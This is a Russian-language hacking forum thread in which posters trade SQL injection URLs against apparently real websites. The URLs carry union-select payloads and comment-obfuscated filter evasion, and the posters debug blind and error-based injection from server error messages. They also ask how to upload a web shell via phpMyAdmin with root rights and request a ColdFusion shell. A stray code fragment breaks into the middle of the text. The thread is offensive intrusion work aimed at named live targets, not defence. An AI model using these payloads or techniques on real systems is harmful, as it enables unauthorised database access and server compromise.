http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

идет фильтрация кавычек...

как можно обойти?

заранее спс

и вот еще интересная

http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*

как залить шелл если имеется доступ только к pma? права root

/thread133925-phpmyadmin+shell.html

а кавычки тут и не нужны, параметр-то числовой

почему не работает юнион:

http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true

помимо гета есть еще и пост

не катит, выдает

Can't execute query SELECT * FROM families WHERE CatID=32 and substring(version(),1,1)=3 true AND date_archived IS NULL ORDER BY orderval

Error: You have an error in your SQL syntax near 'true AND date_archived IS NULL ORDER BY orderval' at line 1

может я что то не так делаю... хз..

" if author else f"
а где ты там вопрос увидел?

ввожу

http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3

выдает норм страницу...

Вы строго не судите меня, я новичок в этом святом деле=)

и если можно , то прошу объяснить принцып действия тут вот этого

именно подбор полей как происходит? типа этого?

или дайте линк...

/thread18552-blind+sql.html - вот это

https://rdot.org/forum/showthread.php?t=245 - потом это

https://rdot.org/forum/showthread.php?t=503 - и напоследок

согласно 3 ссылке и описанному там методу MySQL 3 error based inj, раскручивать её можно через вывод в ошибке, т.е (лишние пробелы, вставляемые форумом, убрать)

Интересует полноценный шелл на Macromedia ColdFusion.